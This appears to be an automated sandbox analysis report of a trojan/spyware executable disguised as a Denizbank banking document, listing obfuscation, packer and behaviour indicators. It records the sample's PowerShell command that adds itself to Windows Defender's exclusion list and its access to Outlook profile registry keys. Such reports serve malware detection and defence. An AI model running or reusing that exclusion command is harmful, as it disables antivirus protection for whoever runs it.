Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, Zz---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, id.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, Zz---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, Zz---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.5270000.4.raw.unpack, id.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, ---.cs	Base64 encoded string: 'NX7D3X7VrTc0eaq7nc1oiZiVcEN8triRP2K7rT9KDWcLM7FjQiSzTlwWGYmrDcHm'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, ---.cs	Base64 encoded string: 'NX7D3X7VrTc0eaq7nc1oiZiVcEN8triRP2K7rT9KDWcLM7FjQiSzTlwWGYmrDcHm'

Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, C3Dgu64wpSQ0gQIH6K.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	Security API names: _0020.SetAccessControl
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	Security API names: _0020.AddAccessRule
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, C3Dgu64wpSQ0gQIH6K.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	Security API names: _0020.SetAccessControl
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/8@4/3

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\denizbank 25.11.2024 E80 aspc.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Mutant created: \Sessions\1\BaseNamedObjects\iGoyAN

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tx2x2e5c.zxc.ps1

Jump to behavior

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: denizbank 25.11.2024 E80 aspc.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: denizbank 25.11.2024 E80 aspc.exe

ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"	Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Section loaded: edputil.dll	Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: yGuK.pdb source: denizbank 25.11.2024 E80 aspc.exe
Source:	Binary string: yGuK.pdbSHA256 source: denizbank 25.11.2024 E80 aspc.exe

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, id.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.5270000.4.raw.unpack, id.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: denizbank 25.11.2024 E80 aspc.exe, LogInGUI.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	.Net Code: UsNjU4XiWf System.Reflection.Assembly.Load(byte[])
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	.Net Code: UsNjU4XiWf System.Reflection.Assembly.Load(byte[])

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: 0xE3290D87 [Sun Oct 8 04:01:11 2090 UTC]

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_07238C4E pushad ; retf	0_2_07238C55
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011A9C30 push esp; retf 0145h	5_2_011A9D55
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A19233 push es; ret	5_2_06A19244

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: section name: .text entropy: 7.944205970111451

Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, q8qlp0MKt6bc6fpogf.cs	High entropy of concatenated method names: 'oJ3gaFH9BQ', 'iHcguTXgBD', 'an1gg3NXcY', 'N4DghjFwcK', 'c95g9m8LgK', 'CrJgL0mdea', 'Dispose', 'k4GJT2r9PB', 'kZwJBUuIoo', 'gl9JHQXnOv'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, WYNTdRwdLMl5qTPEQ1.cs	High entropy of concatenated method names: 'Cwkq4ceZtE', 'DPkqWj5PNI', 'XWGqi7gMwk', 'PuWqXNSZ2U', 'v6eqOWsr69', 'D15qsjuRDV', 'WBxqPYryjL', 'Q7sq8m31Zx', 'KTCqo6wevs', 'b3lqYR8tPu'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, cTXo4LieQS7llBmlju.cs	High entropy of concatenated method names: 'VuLZe0as2H', 'aFMZBAmpkV', 'fZJZCM15ha', 'GPuZxQ8m7L', 'b7TZtARkyh', 'TIUC3FnvJE', 'SZECIESDoB', 'vyRCMmuHLO', 'NfACrWtj1M', 'jxYCkcFHZg'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	High entropy of concatenated method names: 'tsWmeWVjPV', 'zFtmTRuGhy', 'rSPmBCJJ1f', 'sP8mHtoLBO', 'lltmCg4m1T', 'bPTmZWf7K5', 'xACmx8W1s3', 'DKMmtUFT6r', 'Qibmvm8WUY', 'hVGmKGPa3y'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, C3Dgu64wpSQ0gQIH6K.cs	High entropy of concatenated method names: 'l7dBAVxOJ1', 'YtnBVjgfyg', 'cC3BnGdbj6', 'uE5B6MKhss', 'OhEB3Rw60F', 'dnLBIj5yNe', 'AkWBMsp6I4', 'miVBreSW2x', 'ccjBk390gy', 'VMUB2b6Ink'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, j9cpiJ66Z9wiSMtdK0.cs	High entropy of concatenated method names: 'A1FuKNUuFR', 'xsKufkAB19', 'ToString', 'zMDuTSHwbw', 'FceuBgK86E', 'IE6uHPnKob', 'Xa2uCWPYF8', 'l1QuZH3KgV', 'KXBux9ZGam', 'sGEut2JHFK'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, V4kQeGERxknqoQkEuwR.cs	High entropy of concatenated method names: 'ToString', 'CB4h4fGGPm', 'qSAhWdqH4Y', 'WPihFUV0H7', 'os7hidYyv0', 'oqkhXXTyCy', 'PFjhcJWONj', 'VethOl6tJC', 'EVZ6KclBLPxOLu5JuMi', 'b73wW9lNas1DWFf11RR'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, IXAZZOBxjBEyp8hsZs.cs	High entropy of concatenated method names: 'Dispose', 'TbcEk6fpog', 'GAQRXNUuq2', 'oIub3e1hm3', 'mVtE2oGCW4', 'gr3EzuSN6C', 'ProcessDialogKey', 'YjXRDnVHXZ', 'V05REQPOFV', 'zPcRRevPl8'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, ju7ZP0ID9VJZr4PMmj.cs	High entropy of concatenated method names: 'XD1urXd3jZ', 'dXwu2xPJku', 'bYZJDt7UJm', 'D4oJEV1dbo', 'lLduYZfx6k', 'WKZulQyxMX', 'ddYuw6QS0s', 'bKTuAsMR2B', 'lWEuVmC58m', 'sxUunF3iRp'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, uKJZ9dEErKTqKLwmqyJ.cs	High entropy of concatenated method names: 'JaS02FNQYO', 'muF0zCmmVC', 'cmdhDRrTI9', 'OBGhEaqhtB', 'VyEhR1jKU7', 'O8xhm4SnYd', 'Grshja3XtD', 'Y6xheHGF5b', 'uGyhTsDUX8', 'Jy0hBW7ErO'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, g6ox2O7M9PPBS2a34p.cs	High entropy of concatenated method names: 'PxxxSDJsFy', 'fIfxd4jIrM', 'R8JxUAZ4ZG', 'PGLxb4Ltqp', 'aTNx50BmfF', 'vcCxpDEKJp', 'yWlxQ3MT4V', 'gjfx4FVJYD', 'wIkxWVP3xa', 'CMrxFKckID'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, veqIyGz50RFl7Ca1mV.cs	High entropy of concatenated method names: 'OoS0pBJTLW', 'Duq04iddrX', 'bwa0WgObaA', 'qJJ0iLDYU9', 'ge10XTKxqX', 'bK70OqKHmt', 'Sfk0sU64vq', 'pPq0LdxdvI', 'P000S9CBxW', 'Fus0dE01XP'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, PhEnfrnNqESTaLmMtn.cs	High entropy of concatenated method names: 'ToString', 'LYTyYFKvRO', 'n7tyX4Ci1H', 'XYiyc9vsRe', 'cWVyOMGrv1', 'tLWysAdJlB', 'LXFyN63Xox', 'b6YyPjhVyv', 'YKDy8dVYGO', 'EGky7dM2Yx'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, HnVHXZkI05QPOFVUPc.cs	High entropy of concatenated method names: 'IecgiiUhPi', 'j20gX6m5s4', 'Qk6gcce8G1', 'nwlgO0isJj', 'skbgsCC2qN', 'FtCgNaYqsc', 'UdHgPR7j1u', 'lDHg8qMUnY', 'oE6g7CBe19', 'fOTgoRS3bm'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, gEM2EEW1CxFeO5Qa7B.cs	High entropy of concatenated method names: 'Wv7Hb9S685', 'KHFHp4x9vQ', 'gB3H4UeeXb', 'rC4HWwriyw', 'W8eHa4EX99', 'vxWHyM1WqB', 'BUjHuXelq5', 'mnDHJHJILa', 'n6OHgyeMFC', 'W0KH03Mw98'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, e5PLwVEDrjc1DXkT6Ee.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DCC0Y4BNDL', 'dYJ0lUTmBe', 'E7V0wtt0TY', 'tuu0AK4bPy', 'k5c0VLi0YV', 'XIZ0nrXB7g', 'M9c06APe6G'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, OR4PrZR3vKDptJU2LL.cs	High entropy of concatenated method names: 'ebSUDN5bA', 'FcubvOxv6', 'Inap2B5eP', 'duFQHG9nZ', 'SH2Wi0QDT', 'GJxFr01RI', 'QDKXAWICCVXcTLReNn', 'N5c7W9K9n7UWqgBSod', 'yLwJ1gARZ', 'MGR0ywZIy'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, lZB8mFEjIPgEnB952He.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Q2JGgQdFCy', 'ueTG0uGcgr', 'UWxGhxEhiQ', 'sgbGGQdwuY', 'Jn1G9NUUNE', 'aF8G1Ks0Vc', 'PHNGLTiXIF'
